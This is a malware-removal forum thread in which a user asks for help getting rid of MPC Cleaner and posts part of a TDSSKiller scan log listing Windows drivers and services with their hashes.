Log analysis and evaluation: MPC Cleaner cannot be deleted (Malware)
Windows 7
If you have caught a trojan or keep getting virus warnings, you can post the logs of our diagnostic tools here for evaluation by our experts. To be able to remove viruses and trojans, the infected system must first be examined: First steps for help. Note that an infected system is not trustworthy and should not be used until the malware has been completely removed.
28.03.2016, 23:13 | #1 |
Hello to the friendly helpers,
I have already tried various tools (ADW Cleaner, Avira, Malwarebytes and "manually" deleting the add-ons in all browsers etc.) to get rid of MPC Cleaner, unfortunately without success. After a restart the program keeps reappearing, and the folder cannot be deleted in the file manager because of supposedly missing permissions. My "little" PC knowledge is thus exhausted. I have attached log files, scans etc. I hope for your help, because I am slowly running out of ideas. Many thanks in advance.
29.03.2016, 02:25 | #2 |
/// Malwareteam
My name is Rafael and I will help you with the cleanup. So that I can help you in the best possible way, please follow these rules:
There is definitely something to do here...
Note: Your PC shows clear signs of an infection.
Step 1: Please download TDSSKiller.exe and save this file to the desktop.
Step 2: Please start FRST again, tick the box next to Addition and click Scan. Please post the two resulting text files again. So in your next reply, please post:
Please post your results between code tags. If a log is too long, please split it across several replies. Code tags? Just press the # in the reply window and paste the log in between.
__________________
Edited by burningice (29.03.2016 at 02:34)
29.03.2016, 12:12 | #3 |
Hello Rafael,
many thanks already for the quick reply. Here is the first part of my results:
TDSSKiller:
Code:
F61F448B8E305DEFDDA5D4A6FC4E57C798C11ED4DA0ACB885847DC8A9A7B4E98 ] iaStorA C:\WINDOWS\system32\drivers\iaStorA.sys 12:54:46.0570 0x1004 iaStorA - ok 12:54:46.0602 0x1004 [ 08BFE413B0B4AA8DFA4B5684CE06D3DC, 95DEEBB203E12EE6E191F5247A74C04AEC0E16DE981FADDC4D6C42EE41D8D079 ] iaStorAV C:\WINDOWS\system32\drivers\iaStorAV.sys 12:54:46.0633 0x1004 iaStorAV - ok 12:54:46.0649 0x1004 [ A2200C3033FA4EF249FC096A7A7D02A2, 5819F5C2020DE2EEE339B0C08CD4B1E3490EAFBBEA1277CE649DB5A5150986B0 ] iaStorV C:\WINDOWS\system32\drivers\iaStorV.sys 12:54:46.0664 0x1004 iaStorV - ok 12:54:46.0695 0x1004 IDriverT - ok 12:54:46.0695 0x1004 IEEtwCollectorService - ok 12:54:46.0867 0x1004 [ 076023219E918D34585B231029A44571, C2AB0DE0D80D0BC6595C9F9655A890531E7952599714DC03B4ECB46947D833A8 ] igfx C:\WINDOWS\system32\DRIVERS\igdkmd64.sys 12:54:47.0102 0x1004 igfx - ok 12:54:47.0133 0x1004 [ C814D4A0B7B91E936B2DC0828C69ACAB, A19B503CB3C598474C61DA6F1AC087CCF287F7523D2F932B21EF21E7CA1809B1 ] igfxCUIService1.0.0.0 C:\WINDOWS\system32\igfxCUIService.exe 12:54:47.0149 0x1004 igfxCUIService1.0.0.0 - ok 12:54:47.0211 0x1004 [ AF8A43C376F83A4A1E7DA16461EDE114, EBA10519B074888355A4FC11D52FF1E6A52F88F754B7F1F9863A8313638645CB ] IKEEXT C:\WINDOWS\System32\ikeext.dll 12:54:47.0258 0x1004 IKEEXT - ok 12:54:47.0289 0x1004 [ FC7C456AF9B9811499EDBD10616832EE, CA2D8B0E672D3AE449C2FF0B9E142D74E8C72FD877D11162A9F7CC51AF58220F ] intaud_WaveExtensible C:\WINDOWS\system32\drivers\intelaud.sys 12:54:47.0305 0x1004 intaud_WaveExtensible - ok 12:54:47.0414 0x1004 [ 6237A7F235E7BB3D4FAFB7E71B0D6EC1, 5FC6A225BDFEA3461713C16F4A2EAA1728E2D1AEDDFFB4165833EB0D82A99B31 ] IntcAzAudAddService C:\WINDOWS\system32\drivers\RTKVHD64.sys 12:54:47.0539 0x1004 IntcAzAudAddService - ok 12:54:47.0633 0x1004 [ F5495B38BFB9149925F54F65AB40EFBF, 7CBB72C41E2343DACBFB967A39CA04788561EDECB289C41BC2D6A06B80882AC4 ] IntcDAud C:\WINDOWS\system32\DRIVERS\IntcDAud.sys 12:54:47.0664 0x1004 IntcDAud - ok 12:54:47.0727 0x1004 [ 
B353F1834FCD36D77BE3F74992C147D4, BFBC42B500FC7D6D2B523F988DD54156D2B6132CBE366EB591BF45556959A8E9 ] Intel(R) Capability Licensing Service Interface C:\Program Files\Intel\iCLS Client\HeciServer.exe 12:54:47.0742 0x1004 Intel(R) Capability Licensing Service Interface - ok 12:54:47.0789 0x1004 [ 5175C772BCD11C9B0471D30535F15F60, 1F3740ECE66A3F849445DE3A15648BCCC8CB349300C449F107FC762D2B792F0B ] Intel(R) ME Service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe 12:54:47.0805 0x1004 Intel(R) ME Service - ok 12:54:47.0821 0x1004 [ 4E448FCFFD00E8D657CD9E48D3E47157, 4A958CF0BF8DAEAE5E008500BA67CE89B21388592811274331EE39CAC1043A00 ] intelide C:\WINDOWS\system32\drivers\intelide.sys 12:54:47.0836 0x1004 intelide - ok 12:54:47.0867 0x1004 [ 7AA01AB1C110916825E6E1389F1B9AF2, E2885955AFA0908E194B1BC364C9582249B2B2AFFF93F17F3414F55B1E5F2C42 ] intelpep C:\WINDOWS\system32\drivers\intelpep.sys 12:54:47.0867 0x1004 intelpep - ok 12:54:47.0914 0x1004 [ 47E74A8E53C7C24DCE38311E1451C1D9, 79B06E37A552C8A847404D4C572CDB8CF525354D8AE3BEBC06892B7C3B330761 ] intelppm C:\WINDOWS\System32\drivers\intelppm.sys 12:54:47.0930 0x1004 intelppm - ok 12:54:47.0961 0x1004 [ 9DB76D7F9E4E53EFE5DD8C53DE837514, 07BA4EDA9BE9139A689A2C3EFC1D1A4F3D1216625ED145F313398292A2CD5703 ] IpFilterDriver C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys 12:54:47.0992 0x1004 IpFilterDriver - ok 12:54:48.0055 0x1004 [ A5800036E4EA06697A34742A24ACFBE1, BA67060526E9213000B4206F86A74F904999AD7018EFCBE4FE9708650DA9D973 ] iphlpsvc C:\WINDOWS\System32\iphlpsvc.dll 12:54:48.0133 0x1004 iphlpsvc - ok 12:54:48.0180 0x1004 [ 9C096BF5E10CA8BFA56F32522A89FAF1, 6C1151160799338DA351C7237AB049926C6C15F24F5E154BBF5929B4A96C0B8D ] IPMIDRV C:\WINDOWS\System32\drivers\IPMIDrv.sys 12:54:48.0227 0x1004 IPMIDRV - ok 12:54:48.0258 0x1004 [ B7342B3C58E91107F6E946A93D9D4EFD, D5DA3C02C5C5A343785745EF6983CC9B5FBD3FB8D49FE9B450523E50212D1A32 ] IPNAT C:\WINDOWS\system32\drivers\ipnat.sys 12:54:48.0274 
0x1004 IPNAT - ok 12:54:48.0289 0x1004 [ AE44C526AB5F8A487D941CEB57B10C97, A783A2EAF7A6FF450FB3F189A5930036FA60D125C42171AC44B6FE2E3DBD6F7A ] IRENUM C:\WINDOWS\system32\drivers\irenum.sys 12:54:48.0321 0x1004 IRENUM - ok 12:54:48.0336 0x1004 [ 8AFEEA3955AA43616A60F133B1D25F21, E99359A4F1D653790133F145CF7C9F97399FD75C5E135AA7E5F989BB660789AF ] isapnp C:\WINDOWS\system32\drivers\isapnp.sys 12:54:48.0352 0x1004 isapnp - ok 12:54:48.0383 0x1004 [ D90AB68D0FAC9F357F663670FDBB511E, A82AAA5DF1B38EFBDCF834535A0C520D1BB2D7A4A906C18CFDD22BCF16BDB97D ] iScsiPrt C:\WINDOWS\System32\drivers\msiscsi.sys 12:54:48.0399 0x1004 iScsiPrt - ok 12:54:48.0430 0x1004 [ A90C843F4FDD7A07129BA73C6BE13976, A76DEA9F09E3B2F18D3B646A0DD39E2773EC62E2F3C55421BA61C12190D78C1C ] iwdbus C:\WINDOWS\System32\drivers\iwdbus.sys 12:54:48.0430 0x1004 iwdbus - ok 12:54:48.0477 0x1004 [ B2AAF45E83CAFA49A34EB2F2D6D7609C, 1AE9FEE38D295F485165F2BA53F2D7CED5D9845D98F9EAC23ABF2244D3CB1D96 ] jhi_service C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe 12:54:48.0492 0x1004 jhi_service - ok 12:54:48.0524 0x1004 [ 5917AFE4A3F695A54B99C1849C8207FE, DD57638966F2F0387DCF9DA4BBAEE3CDD8CC6F1A2D49581A0374D46A565BED4F ] kbdclass C:\WINDOWS\System32\drivers\kbdclass.sys 12:54:48.0539 0x1004 kbdclass - ok 12:54:48.0586 0x1004 [ 8CD840A062F6BDF41DDE3ACB96164B72, AEAE867F3557C1CE6B931E19D7144A3BD3CBABD81B1542667680D54FC24DEBE1 ] kbdhid C:\WINDOWS\System32\drivers\kbdhid.sys 12:54:48.0586 0x1004 kbdhid - ok 12:54:48.0633 0x1004 [ 813871C7D402A05F2E3A7075F9584A05, FF0C2F87EB083F8CE74C679D80C845CDFBFBBC70BE818F899F3336BBB54A3FFB ] kdnic C:\WINDOWS\system32\DRIVERS\kdnic.sys 12:54:48.0680 0x1004 kdnic - ok 12:54:48.0696 0x1004 [ 382100E75B6F4668AEAEF228C6CEFFAD, 9C7229F10F11D18E1FED6395391A46225A84B421034B9AB6F81AF7430FDC556F ] KeyIso C:\WINDOWS\system32\lsass.exe 12:54:48.0711 0x1004 KeyIso - ok 12:54:48.0727 0x1004 [ 07071C1E3CD8F0F9114AAC8B072CA1E5, 
F72E49D9A77BBE28B135D5DDBD9037083D90400A6D61DA45B5D53C4ACFFAF932 ] KMWDFILTER C:\WINDOWS\System32\drivers\KMWDFILTER.sys 12:54:48.0742 0x1004 KMWDFILTER - ok 12:54:48.0852 0x1004 [ 4E829B18D5BAEC29893792A3C671A847, 64C3B99F53A9D1ACA802B46B09E820AD210B667D5A1CD0ADAF1F12944B15B52E ] KSecDD C:\WINDOWS\system32\Drivers\ksecdd.sys 12:54:48.0867 0x1004 KSecDD - ok 12:54:48.0899 0x1004 [ 35C19AF2116F67914712D7C4CBE47B8C, 5F976726880A6E51D7ABFA7E3EF7294C6FB7F383DC5710A2C2EC8DD26DAEC204 ] KSecPkg C:\WINDOWS\system32\Drivers\ksecpkg.sys 12:54:48.0930 0x1004 KSecPkg - ok 12:54:48.0930 0x1004 [ 11AFB527AA370B1DAFD5C36F35F6D45F, 757AD234284467ADB826F7CA0251F58D48866B91995BC867DEA4BAF676947163 ] ksthunk C:\WINDOWS\system32\drivers\ksthunk.sys 12:54:48.0992 0x1004 ksthunk - ok 12:54:49.0039 0x1004 [ C1591A66028C71147A3E2EAB0B1CCB7E, 82F3D5DCC1614398A144D9791E4BAA814DBA9112677341FD57D5E9834CEDEB41 ] KtmRm C:\WINDOWS\system32\msdtckrm.dll 12:54:49.0071 0x1004 KtmRm - ok 12:54:49.0102 0x1004 [ CA2828DDE4B09FEFFDB7CE68B3D8D00A, B514792FF1EF36C678BB51644A1C420105D5E2CD6DD5A89A3FB252D08277A40C ] LanmanServer C:\WINDOWS\system32\srvsvc.dll 12:54:49.0164 0x1004 LanmanServer - ok 12:54:49.0196 0x1004 [ 3DBD9100745F9B8506B8FEC6FE6CCDE3, C3EF2856A1680AFDE133887E48946CF9CAB6755C3BDC07F0326965DCD4096F62 ] LanmanWorkstation C:\WINDOWS\System32\wkssvc.dll 12:54:49.0227 0x1004 LanmanWorkstation - ok 12:54:49.0274 0x1004 [ 8B9F3796EC1762CF255BDB324E5529C8, F73D6BEF19BE20AEB18DA82CB63E9D8B50ACBBE4ED9B646EF0C9F598F6B81F94 ] lfsvc C:\WINDOWS\System32\GeofenceMonitorService.dll 12:54:49.0336 0x1004 lfsvc - ok 12:54:49.0367 0x1004 [ C09010B3680860131631F53E8FE7BAD8, 35F2A06D5F29478D22ABDCC20DA893EF9D96504C65594A0CEA674D1C21B04FF8 ] lltdio C:\WINDOWS\system32\DRIVERS\lltdio.sys 12:54:49.0399 0x1004 lltdio - ok 12:54:49.0430 0x1004 [ DAE98CC96C5EE308BF4EA7B18F226CB8, 7A6CC56BF075010707715AB6608764291E358EDF27C806A025532869004C686B ] lltdsvc C:\WINDOWS\System32\lltdsvc.dll 12:54:49.0461 0x1004 lltdsvc - 
ok 12:54:49.0508 0x1004 [ 95DD1E89A772A383E0FDC677A2E2ED44, 94701ACC1F4D5422CB7084609BC25D34A05F68829DB5030AA6697BD7DBC3B0B2 ] LMDriver C:\WINDOWS\System32\drivers\LMDriver.sys 12:54:49.0508 0x1004 LMDriver - ok 12:54:49.0555 0x1004 [ 1E2662D847B7D9995C65D90D254A7E0F, AFD4063D2071FFCB6B0EAC0715276D986F42326919C86E525DCE12E1109A93E2 ] lmhosts C:\WINDOWS\System32\lmhsvc.dll 12:54:49.0586 0x1004 lmhosts - ok 12:54:49.0618 0x1004 [ 9CA9CB0E115418F90FFC67973462280A, E3B25C360A9F5A614206B6AD07E67B2AF71D667E3CDC56BAC11F4C5AD0BACAA6 ] LMS C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe 12:54:49.0633 0x1004 LMS - ok 12:54:49.0711 0x1004 [ E1A37D1BF2F57345D078C324693F6A38, 99EF79344DB7EB1EBCABA716112FD23A350574BD67C451F421207E5341704504 ] LMSvc C:\Program Files\Acer\Acer Launch Manager\LMSvc.exe 12:54:49.0727 0x1004 LMSvc - ok 12:54:49.0774 0x1004 [ C755AE4635457AA2A11F79C0DF857ABC, E03D1ACAC155287291FE1BD0B653953ADC94279A74D0152088D698FAA796460F ] LSI_SAS C:\WINDOWS\system32\drivers\lsi_sas.sys 12:54:49.0789 0x1004 LSI_SAS - ok 12:54:49.0805 0x1004 [ ADAC09CBE7A2040B7F68B5E5C9A75141, 7865DA7E91404F3642BC444B97F6B7AA42B9523D5EDD7F6365DA236B8EC3410F ] LSI_SAS2 C:\WINDOWS\system32\drivers\lsi_sas2.sys 12:54:49.0821 0x1004 LSI_SAS2 - ok 12:54:49.0821 0x1004 [ 04D1274BB9BBCCF12BD12374002AA191, 4B9618F8D25F2278DE1610A70ACAADB074D171D162C3AF27D464F5DC800A8E60 ] LSI_SAS3 C:\WINDOWS\system32\drivers\lsi_sas3.sys 12:54:49.0836 0x1004 LSI_SAS3 - ok 12:54:49.0868 0x1004 [ 327469EEF3833D0C584B7E88A76AEC0C, 3D88B5A2D68F93F01B39C6E3D8D5C7A2A20686EFC756086E66AFFF1BC3019B85 ] LSI_SSS C:\WINDOWS\system32\drivers\lsi_sss.sys 12:54:49.0883 0x1004 LSI_SSS - ok 12:54:49.0930 0x1004 [ 9A7A7E45DAED2E8C2816716D8D28236A, C94787988826E546A8DC752BD6BE4EA7423DC3762B2D371DB297A63F865A95FF ] LSM C:\WINDOWS\System32\lsm.dll 12:54:49.0993 0x1004 LSM - ok 12:54:50.0039 0x1004 [ DDEE191AB32DFC22C6465002ECDF5EE4, 190C3930A8449118F9FEDF43C482837EF1C255E6D67F9651156E66A1E2BC6553 ] 
luafv C:\WINDOWS\system32\drivers\luafv.sys 12:54:50.0071 0x1004 luafv - ok 12:54:50.0086 0x1004 [ EB5C03A070F30D64A6DF80E53B22F53F, 12051B6AEBDEE1E28F24364F25A52BA3A6E282ECF86D6290E34BD38E6D4E066D ] megasas C:\WINDOWS\system32\drivers\megasas.sys 12:54:50.0102 0x1004 megasas - ok 12:54:50.0149 0x1004 [ F6F13533196DE7A582D422B0241E4363, B3CD9B08937AFFF12141B38634AF3A56F5AC5FF3EF03941802B9841DEC559469 ] megasr C:\WINDOWS\system32\drivers\megasr.sys 12:54:50.0164 0x1004 megasr - ok 12:54:50.0211 0x1004 [ 772A1DEEDFDBC244183B5C805D1B7D85, 7D821B8DF1F174E5414FFDEAB5207DB687740E9842F7203600AEBA086945AFC9 ] MEIx64 C:\WINDOWS\System32\drivers\HECIx64.sys 12:54:50.0227 0x1004 MEIx64 - ok 12:54:50.0274 0x1004 Microsoft SharePoint Workspace Audit Service - ok 12:54:50.0321 0x1004 [ 4C5179DB61B9E14BEC15CDC4B152B2E9, 9048BEC7AD6A3F4B640E99B1F0365AC9A46740B188758FBB2C160EF30AD6E64B ] MMCSS C:\WINDOWS\system32\mmcss.dll 12:54:50.0368 0x1004 MMCSS - ok 12:54:50.0399 0x1004 [ 8B38C44F69259987C95135C9627E2378, E698B82D4EFFF56D66C7FC9866369BA5736FDBDBE2028CC421C51E70DEA74727 ] Modem C:\WINDOWS\system32\drivers\modem.sys 12:54:50.0430 0x1004 Modem - ok 12:54:50.0446 0x1004 [ 601589000CC90F0DF8DA2CC254A3CCC9, D1238A386C41B6C368D9A44B7C112C943995B5403E2A5B4B7346B266DDB0C5A0 ] monitor C:\WINDOWS\System32\drivers\monitor.sys 12:54:50.0477 0x1004 monitor - ok 12:54:50.0508 0x1004 [ 08374E4E5B8914DE6067CBA99F61E930, CBB1390D6523FC968BEDF78FD13699488621ACB2CD1DF55D1606316090548661 ] mouclass C:\WINDOWS\System32\drivers\mouclass.sys 12:54:50.0524 0x1004 mouclass - ok 12:54:50.0571 0x1004 [ 5FCBAB60598AE119E02B4C27DE6B99EA, 36F30094F700DE41C293047ACB49ED1961DD927BEDAD8DFDAB7023D4D24CB0DE ] mouhid C:\WINDOWS\System32\drivers\mouhid.sys 12:54:50.0633 0x1004 mouhid - ok 12:54:50.0664 0x1004 [ 9A788037D768809DFD677F4BA08A224A, E0686B3318F924E440ADA439D6671D44D3FF97C13D45C2E0A3A7B9E23DA38350 ] mountmgr C:\WINDOWS\system32\drivers\mountmgr.sys 12:54:50.0680 0x1004 mountmgr - ok 12:54:50.0711 0x1004 
[ A43F5F2D3D71A902502D61E71A18C265, 9685DABFF80EFFFD28B9B12696BF4821F30989C8441EA0AA3FF0F03ED799AD9D ] MozillaMaintenance C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe 12:54:50.0727 0x1004 MozillaMaintenance - ok 12:54:50.0758 0x1004 [ 9352AEB710669624DA3F1A4057336A3E, D93523308096367BB87DFA22D643E57A1BABF254BD3A0B8A2165DD75488016B4 ] MPCKpt C:\WINDOWS\system32\DRIVERS\MPCKpt.sys 12:54:50.0774 0x1004 MPCKpt - ok 12:54:50.0868 0x1004 [ 620FC442033A897C6CCE02FFE55C045D, 8621FD51B52D516F875F6CBF7003873E38E1758EC3C653B68EEF4C54DDB54F9B ] MPCProtectService C:\Program Files (x86)\MPC Cleaner\MPCProtectService.exe 12:54:50.0883 0x1004 MPCProtectService - ok 12:54:50.0930 0x1004 [ 6FC047578785B0435F4E2660946D1ADC, 8AEA5659F01FC2F75160922C69622502DABA39F33CB90D5178DD679A1CDE617D ] mpsdrv C:\WINDOWS\system32\drivers\mpsdrv.sys 12:54:51.0008 0x1004 mpsdrv - ok 12:54:51.0055 0x1004 [ C18AA14126ADC66478E8E962B2DFAA98, A6F8CE9D88D590DC083253004392572C3BD02C33433CD6C0D9117D2AA7171EEC ] MpsSvc C:\WINDOWS\system32\mpssvc.dll 12:54:51.0086 0x1004 MpsSvc - ok 12:54:51.0164 0x1004 [ D2AC8F07995CE6CD18848C129435B481, 839B04116B49A757950E049150F6AADE41335914CC699ED73BE886BECAC39D36 ] MRxDAV C:\WINDOWS\system32\drivers\mrxdav.sys 12:54:51.0211 0x1004 MRxDAV - ok 12:54:51.0258 0x1004 [ 61000E7155E92342D0D5338CE05D102A, BCFA1A82B9727040C496A84F42D4613B96EC445018BDFBF2E180889B1B561559 ] mrxsmb C:\WINDOWS\system32\DRIVERS\mrxsmb.sys 12:54:51.0305 0x1004 mrxsmb - ok 12:54:51.0352 0x1004 [ BCBD64220AD85C26823453FF1DC3EFBD, 0245E3659E9135B9276F3CCFBEA0CEFFC4F4C0826F6D19B6329057620235F087 ] mrxsmb10 C:\WINDOWS\system32\DRIVERS\mrxsmb10.sys 12:54:51.0430 0x1004 mrxsmb10 - ok 12:54:51.0446 0x1004 [ B0A106352DEF6D52332EA39E00462EA7, 274422C1E172B673130944F2FF2A2D9A9A364CFFC02FD04DD7D6D45B34C5022A ] mrxsmb20 C:\WINDOWS\system32\DRIVERS\mrxsmb20.sys 12:54:51.0493 0x1004 mrxsmb20 - ok 12:54:51.0524 0x1004 [ F3C060444777A59FC63D920719E43CCD, 
8766A2746E3DFB0749E902F458141269335CA6F0CEDCA3D5F8C204637C19E783 ] MsBridge C:\WINDOWS\system32\DRIVERS\bridge.sys 12:54:51.0571 0x1004 MsBridge - ok 12:54:51.0602 0x1004 [ 915747E010A9414B069173284A9B93F4, 8A335C28FE1EF96DD71485877F2E86155D24B5614ACE05468F4B07E2ACD56331 ] MSDTC C:\WINDOWS\System32\msdtc.exe 12:54:51.0633 0x1004 MSDTC - ok 12:54:51.0664 0x1004 [ D13329FBF8345B28AB30F44CC247DC08, 9C7EC2D4D65E6510EB5B9E61BB0D14F725D7E8FE98D65161C3971E43EF1AB6EB ] Msfs C:\WINDOWS\system32\drivers\Msfs.sys 12:54:51.0696 0x1004 Msfs - ok 12:54:51.0727 0x1004 [ C6B474E46F9E543B875981ED3FFE6ADD, E16687E52FB649C23D92159A1F036CB662202C1E58D961EECDAA528AA4FA669A ] msgpiowin32 C:\WINDOWS\System32\drivers\msgpiowin32.sys 12:54:51.0743 0x1004 msgpiowin32 - ok 12:54:51.0758 0x1004 [ 65C92EB9D08DB5C69F28C7FFD4E84E31, D709BA4723225321F665B1157A33A4AE230420752308EF535DA9A41CAC164628 ] mshidkmdf C:\WINDOWS\System32\drivers\mshidkmdf.sys 12:54:51.0789 0x1004 mshidkmdf - ok 12:54:51.0821 0x1004 [ 52299F086AC2DAFD100DD5DC4A8614BA, B36BE0FC96798E5EB8C193C318970E3906961E3ABC3BFAAD73138C76D9A95B0B ] mshidumdf C:\WINDOWS\System32\drivers\mshidumdf.sys 12:54:51.0852 0x1004 mshidumdf - ok 12:54:51.0868 0x1004 [ 36D92AF3343C3A3E57FEF11C449AEA4C, ECC85AA1E530DF55B4A4545798219F87F0FCA66DDD2E37BCEF0850D3C9129DD2 ] msisadrv C:\WINDOWS\system32\drivers\msisadrv.sys 12:54:51.0883 0x1004 msisadrv - ok 12:54:51.0915 0x1004 [ 4EAEEBAC8CFF4E0D717DFA920BC58A90, A65CB1BB3392B6A04B978348CAC18A414560A6B04A727F22DFC0ADB20DD3AF6B ] MSiSCSI C:\WINDOWS\system32\iscsiexe.dll 12:54:51.0946 0x1004 MSiSCSI - ok 12:54:51.0946 0x1004 msiserver - ok 12:54:51.0977 0x1004 [ A9BBBD2BAE6142253B9195E949AC2E8D, 599D2952D4E0B0B3E02D91E38A30F4900B1ADA330716B887B156A1CB9A3E6EE9 ] MSKSSRV C:\WINDOWS\system32\drivers\MSKSSRV.sys 12:54:52.0008 0x1004 MSKSSRV - ok 12:54:52.0040 0x1004 [ 51B3AC0560848CD6D65AC2033E293113, 73A27E88774C6929328E6C9FC9C389F4DF76D4D4D5CBFC4F51651CC308829628 ] MsLldp 
C:\WINDOWS\system32\DRIVERS\mslldp.sys 12:54:52.0086 0x1004 MsLldp - ok 12:54:52.0102 0x1004 [ 7B2128EB875DCBC006E6A913211006D6, 97BBD7FF770741FBFC0F181A609AD0954EA926DA203B742E8F08C89AD8FE476E ] MSPCLOCK C:\WINDOWS\system32\drivers\MSPCLOCK.sys 12:54:52.0118 0x1004 MSPCLOCK - ok 12:54:52.0133 0x1004 [ 1E88171579B218115C7A772F8DE04BD8, B9EAA835D0BF8F9C4DF8403D95EF1400E8AE38F28F9DBA87657DE2129FEF02D2 ] MSPQM C:\WINDOWS\system32\drivers\MSPQM.sys 12:54:52.0149 0x1004 MSPQM - ok 12:54:52.0180 0x1004 [ BBE2A455053E63BECBF42C2F9B21FAE0, 7C5DF563499DF59DF9895A1581E47ADF5FD54C94ECEF6C886CDB60E5E95A6DAE ] MsRPC C:\WINDOWS\system32\drivers\MsRPC.sys 12:54:52.0196 0x1004 MsRPC - ok 12:54:52.0227 0x1004 [ 8D6B7D515C5CBCDB75B928A0B73C3C5E, 1EB4DC3DD21D2627C78EC3F9931D9E5D033169087E43B5D7C17BF1FF2A0028CD ] mssmbios C:\WINDOWS\System32\drivers\mssmbios.sys 12:54:52.0227 0x1004 mssmbios - ok 12:54:52.0258 0x1004 [ 115019AE01E0EB9C048530D2928AB4A2, 6E2275E85EACF2D0FC784792E0D72A165589D33CBAB3BCFA8E271CA09566C925 ] MSTEE C:\WINDOWS\system32\drivers\MSTEE.sys 12:54:52.0274 0x1004 MSTEE - ok 12:54:52.0305 0x1004 [ 96D604A35070360F0DD4A7A8AF410B5E, F94DD1A3566C7C8D0A76D6E1E2530552A9B7F99C5DA0DE11829325EAB9F8B7ED ] MTConfig C:\WINDOWS\System32\drivers\MTConfig.sys 12:54:52.0368 0x1004 MTConfig - ok 12:54:52.0399 0x1004 [ 619CA29326B82372621DB2C0964D8365, 4091F08E266DB45A6E33A4A8B1CE9FA78BB294B3111526AA9E3868620F30AFDF ] Mup C:\WINDOWS\system32\Drivers\mup.sys 12:54:52.0399 0x1004 Mup - ok 12:54:52.0415 0x1004 [ B8C35C94DCB2DFEAF03BB42131F2F77F, F0FCF367CA8F722D6ABCF7F363CD406D890D71452E91C3FC6677B47AD74D6324 ] mvumis C:\WINDOWS\system32\drivers\mvumis.sys 12:54:52.0430 0x1004 mvumis - ok 12:54:52.0477 0x1004 [ 8DF30698BDD9492A9D45A4B94FB4A82A, 26B1B2D7E785E29B8BCB74C467C66AE4EBDD481ACFF36334F3BDF4506B778244 ] napagent C:\WINDOWS\system32\qagentRT.dll 12:54:52.0508 0x1004 napagent - ok 12:54:52.0555 0x1004 [ 008F7CED69FD5B30CBDE1E03C6F36A27, 
D4ADA7834C470B17A3CD976012DC5A511B32545B9F91D23D09A85722E0B75320 ] NativeWifiP C:\WINDOWS\system32\DRIVERS\nwifi.sys 12:54:52.0618 0x1004 NativeWifiP - ok 12:54:52.0711 0x1004 [ E59AFB64C2F6E0C99350E1C944C75088, 10A9044192D0A83857A57286EABB05037922860483DA2B05AFCC485A8311E4EF ] NAUpdate c:\Program Files (x86)\Nero\Update\NASvc.exe 12:54:52.0743 0x1004 NAUpdate - ok 12:54:52.0805 0x1004 [ BFCE1225D10619029E68946929CEB64C, 499F560331FFBA82E3D673B47F027FDAB7BEE4F2CB5B811D69E0218839F6E6A5 ] NcaSvc C:\WINDOWS\System32\ncasvc.dll 12:54:52.0852 0x1004 NcaSvc - ok 12:54:52.0899 0x1004 [ 267C97373110B7AFD3B46DF60B6CBB85, CEBB99F71D47634BB9C04DF2836DF6B47F15B3073FEFC237F85526DF01E4E38B ] NcbService C:\WINDOWS\System32\ncbservice.dll 12:54:52.0930 0x1004 NcbService - ok 12:54:52.0961 0x1004 [ 0813B71EAF097208DC76CE0605B48AF0, A93A2E6A8FB77B58AC4D580E6F8BF307A25BADC9493994F9BE235EBFB0E1DB22 ] NcdAutoSetup C:\WINDOWS\System32\NcdAutoSetup.dll 12:54:52.0993 0x1004 NcdAutoSetup - ok 12:54:53.0055 0x1004 [ 97DC5967F65503213FD1F1B3E4A6F983, 3EC515856C7CE9B30032F963DC04190F66EE62402A819781DC45B7D088C84229 ] NDIS C:\WINDOWS\system32\drivers\ndis.sys 12:54:53.0102 0x1004 NDIS - ok 12:54:53.0165 0x1004 [ 8CECC8DA55F3274181FD1EA28AD76664, 188112424CEF97FB926A0FB915260B803555A775DD2E1846725A9C8616300F42 ] NdisCap C:\WINDOWS\system32\DRIVERS\ndiscap.sys 12:54:53.0196 0x1004 NdisCap - ok 12:54:53.0227 0x1004 [ 269882812E9A68FFF1AFE1283D428322, 50B99EBC42DA9B46A8C2C28C9BADCF58AE3079535CDD1227D0F5C86291C715FF ] NdisImPlatform C:\WINDOWS\system32\DRIVERS\NdisImPlatform.sys 12:54:53.0290 0x1004 NdisImPlatform - ok 12:54:53.0321 0x1004 [ DC1D9F692C2AD84C214584C28501C1F7, 96FC0D1EC48FED963E02648541A2AAC8E72ED00D797EA8E3D0ED02F5EB4816C5 ] NdisTapi C:\WINDOWS\system32\DRIVERS\ndistapi.sys 12:54:53.0383 0x1004 NdisTapi - ok 12:54:53.0399 0x1004 [ B832B35055BA2B7B4181861FF94D8E59, 2E60E5D503E88D27E35ECFEE265D51328E93A9C7B9B931F86D9CBC947636BB00 ] Ndisuio C:\WINDOWS\system32\DRIVERS\ndisuio.sys 
12:54:53.0430 0x1004 Ndisuio - ok 12:54:53.0430 0x1004 [ 1F58E48EF75F34C35D8E93A0DC535CFE, D65619A6C4B1747F8B05DA08A44EF0E46B5CC384880E04E4755A2BA6CDB3C4EA ] NdisVirtualBus C:\WINDOWS\System32\drivers\NdisVirtualBus.sys 12:54:53.0461 0x1004 NdisVirtualBus - ok 12:54:53.0493 0x1004 [ DEC29080202D4F9F17F55E18BCFCC41A, F7E543741B1F4F637A99C40543D6AEC6EBF893F74359BBA769D1F882E0AFB571 ] NdisWan C:\WINDOWS\system32\DRIVERS\ndiswan.sys 12:54:53.0524 0x1004 NdisWan - ok 12:54:53.0524 0x1004 [ DEC29080202D4F9F17F55E18BCFCC41A, F7E543741B1F4F637A99C40543D6AEC6EBF893F74359BBA769D1F882E0AFB571 ] NdisWanLegacy C:\WINDOWS\system32\DRIVERS\ndiswan.sys 12:54:53.0555 0x1004 NdisWanLegacy - ok 12:54:53.0571 0x1004 [ 0BBE2FA30BAD58C9ADC01E4F84A3D2A1, 913AEC8A5F735C2EFDCB417E4077AB5A15457C601E6E88A1F4FA52C91E6E0BBF ] NDProxy C:\WINDOWS\system32\drivers\NDProxy.sys 12:54:53.0602 0x1004 NDProxy - ok 12:54:53.0649 0x1004 [ 3083926D1CC5B56EA0786527B557DD1B, 3C3F0CA0D43398576DBE8F677B353ADDA7E8F56829874958CE668E31261C1590 ] Ndu C:\WINDOWS\system32\drivers\Ndu.sys 12:54:53.0712 0x1004 Ndu - ok 12:54:53.0743 0x1004 [ 42FF4975D032CAE558AE4BB8448F6E5A, 